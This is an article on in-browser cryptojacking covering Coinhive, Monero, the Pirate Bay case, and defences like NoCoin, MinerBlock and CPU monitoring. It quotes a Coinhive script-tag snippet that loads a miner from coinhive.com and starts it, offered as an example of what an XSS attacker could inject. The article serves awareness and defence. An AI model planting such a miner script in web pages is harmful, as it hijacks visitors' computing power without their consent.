In-Browser Cryptojacking: An Old Threat in a New Guise

by Pulkit Jain

Project:  github.com/pjain03/spike_detector  This is a utility to raise an alert if a particular process's CPU usage is too high.  Built with cryptojacking in mind, given an argument specifying which browser you're using, this utility raises an alarm if it uses up more than a specified amount of your CPUs power at which you may verify the state of your computer.

Cryptocurrencies have become an extremely valuable resource in recent times which has attracted many to try to obtain them in vast quantities.

Not surprisingly, this increase in popularity has invited a measure of crime into the fold.  The goal of this article is to describe the state of cryptomining and cryptojacking, how it affects the general public, and discuss a few ways to detect and suppress it when it occurs in one's web browser.  Finally, we will touch upon the legitimacy of in-browser cryptomining as a possible alternative to ads as a source of income for websites.

Introduction

The high rewards that the field of cryptocurrencies currently offers has enticed many to devote a lot of finances, time, and energy into building a cryptocurrency portfolio that is as large and diversified as possible.

Some choose to purchase and sell crypto as they would stock or shares, but others instead choose to undertake the task of "cryptomining."  The specifics of how cryptomining works is beyond the scope of this article, but to provide a very brief background, it involves people performing complex computational tasks in return for cryptocurrency.

The more one mines, the more crypto one acquires, and the more wealth one accumulates.  Increased computation power allows a cryptominer to mine more, and this has resulted in a race to gather as much hardware (GPUs, ASICs, etc.) as one can to mine as much as possible.  It has also unsurprisingly attracted cryptominers to participate in the malicious act of "cryptojacking."  As the term implies, cryptojacking refers to the unauthorized use of someone's computer in order to outsource the calculations need to cryptomine.

To the Community

Cryptojacking manifested itself as a legitimate threat to large-scale businesses early in 2018 when attackers wrested control of resources from Tesla and Jenkins to mine cryptocurrency.

In terms of sheer cost, cryptomining on business resources (such as AWS servers as in the cases of the previously mentioned companies) can slow servers to a complete halt, cause an immense increase in power consumption (a Bitcoin transaction uses as much energy as a house does in a week), and, upon detection, adversely affect a company's trust-relationship with its users.

Due to the novelty of this attack, it is still not something businesses are necessarily aware of or taking seriously.  The fact that the frequency of these attacks is growing unboundedly makes it a severe security threat.

Not only does cryptojacking pose a risk to businesses, but it also affects many unaware end users.

In fact, Symantec, a cybersecurity company, reported that cryptojacking had increased by 8500 percent over the last quarter of 2017, likely due to the increased ease with which it could be done remotely though people's browsers.  Coinhive - a JavaScript library packaging all the tools required to perform cryptojacking, has been a key cause of this.  It provides the tools necessary for malicious individuals to mine cryptocurrency on someone's device without their permission.

Although such a utility - albeit in a reduced and less-powerful format - existed prior to Coinhive in libraries such as Bitcoin Plus, in-browser cryptomining using Coinhive has resurfaced in a remarkable manner due to its ease of use and the availability of cryptocurrencies that can be mined easily in-browser (Monero).

The unauthorized cryptomining that both cryptojackers and websites perform increases the end-user's power consumption, causes their processors to overheat and slow down, and affects the longevity of their devices.  As such, to be able to detect and stop cryptojacking would be immensely useful to everyone.  This article will focus on the detection of in-browser cryptojacking to spread awareness amongst the average user.

In-Browser Mining

Bitcoin

A lot of people believe Bitcoin and the concept of cryptocurrencies to be synonymous and with good reason: it has been one of the most volatile and hence profitable cryptocurrencies in the market, and currently holds the largest well-known market cap for cryptocurrencies, which has brought it immense popularity.  But there are a lot more cryptocurrencies out there than just Bitcoin.

Due to technical reasons beyond the scope of this article, Bitcoin mining moved from being viable over CPUs to GPUs and now to ASICs (specifically designed to mine Bitcoin).  As such, Bitcoin is not a cryptocurrency that can be mined in browser (profitably) anymore.  Even if it could be mined from a browser profitably, Bitcoin has considerable privacy issues that provide adequate barriers to anyone looking to use it as a currency for illegal purposes.  For example, a major issue (which has had a few "messy workarounds") is that any end of a transaction risks exposure of the complete sum of money owned by either party.

Monero

In sharp contrast to Bitcoin, Monero was developed specifically to be able to be mined through multiple different computational resources at once.

Compared to Bitcoin, it is relatively new, however it still has a considerable market cap, is monitored by law enforcement to a much lesser degree, and has a much greater emphasis on privacy.  These reasons have motivated criminals to move their transactions over to Monero.  A popular example of this is that the operator(s) of the immensely infamous WannaCry worm moved their ransom payments from Bitcoin to Monero for added untraceability.

In addition to this, it is extremely easy to mine Monero through the popular tool Coinhive, which is available as a JavaScript library, and can be embedded into a website.  Initially created as an alternate source of revenue for businesses where websites could mine cryptocurrency on their users' CPUs, it has become a dangerous cryptojacking tool because it doesn't get user permission or make CPU throttling compulsory.  To Coinhive's credit, it maintains that it is firmly an alternate source of revenue (discussed further in this article), but because the above restrictions are unenforced, there is no way to stop malicious people from abusing this tool.  Moreover, it is available as a script that can be run easily, thus any website that is susceptible to XSS attacks (vulnerability 7 on OWASP's top ten) could be made part of a larger pool of websites that mine for a malicious attacker.

From the documentation of Coinhive's website.
How easy it is to set up a miner as injectable script tags.

<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.User('SITE_KEY', 'john-doe'); miner.start(); </script>

Others

Due to the rapid rise values of most cryptocurrency, there are a lot of options for what can be mined - a popular one being Ethereum (the cryptocurrency with the second largest market cap).

But the issue with the most popular cryptocurrencies is that most of the mining that could have been done has been done and any future profitable mining requires costly dedicated machinery.  The ones that aren't as popular yet might not be worth mining.  Monero, however, provides the perfect medium between the two.

As for alternative mining software, there are a few worth mentioning such as Coinhive CAPTCHA and Coinhave.  We will focus on Coinhive since it dominates the market by far.  In a 2018 study, one in 7000 websites (voluntarily or involuntarily) were found to be mining cryptocurrency with Coinhive being the most popular tool (93.82 percent) that was used.

Defenses: Detection and Blocking

Traditional techniques to block undesirable content on the Internet (such as those used by ad blockers) whereby a blacklist of cryptomining software/websites is maintained and verified against are useful in blocking cryptomining.

As such, they should be utilized by all users.

In fact, Adblock Plus, a popular ad blocker, was upgraded to include blocking such unauthorized mining.  NoCoin, another popular extension, maintained a more extensive blacklist of cryptomining scripts and CDNs, and has been hailed as a very popular option to negate unauthorized, in-browser cryptomining.  However, as these tools grew in complexity, so did the cryptojackers.  Recently, these criminals have come up with proxy networks to deliver the same content (Coinhive miners, etc.) which cannot be detected by ordinary techniques and saves them the fee they must pay to Coinhive.

MinerBlock is another browser extension that maintains blacklists much like its other discussed counterparts but, in addition to it, monitors the scripts used by websites for behavior similar to traditional cryptomining/Coinhive.

This serves to not only deter those proxy networks, but also inlined JavaScript in websites.  However, if there is anything we have learned as a community from the behavior of malicious cybercrime, it is that there will always be new ways for attackers to adapt to our defensive measures.  Therefore, when cryptojackers find another way to mine cryptocurrencies in-browser, it will resurface.

As such, the only foolproof way to defend an individual user's resources is as follows:

1. Keep updated versions of the aforementioned browser extensions.
2. Monitor CPU usage/computer performance and if the root of it lies in the browser, be wary of cryptojacking.  (See project linked at the top of this article)

Conclusion

Seeing as cryptojacking has been growing at a frightening rate, it is important that the security community, big corporations, and casual users be aware of the threat that it poses.

Furthermore, it is important that users be aware of the resources at their disposal, and of the reasons and thought behind it all.  As such, it is important to consider Coinhive's purported purpose: it aims to be an alternative source of income for websites.  As long as websites can mine using Coinhive without unboundedly charging their users' CPUs (as The Pirate Bay did very infamously), it might help websites supplement their revenue and improve user experiences on the Internet by reducing the number of ads, all without choking up their users' resources.

However, by placing the onus of this in the hands of the implementers without necessitating user permission or consideration (in the form of throttled mining), Coinhive has created a tool that can be used to wreak massive amounts of havoc which must be defended against.

If, however, we are able to stop the websites that choke up resources and allow websites that do not to continue to perform minor cryptomining, we might be able to safely reach an optimal user experience on the web.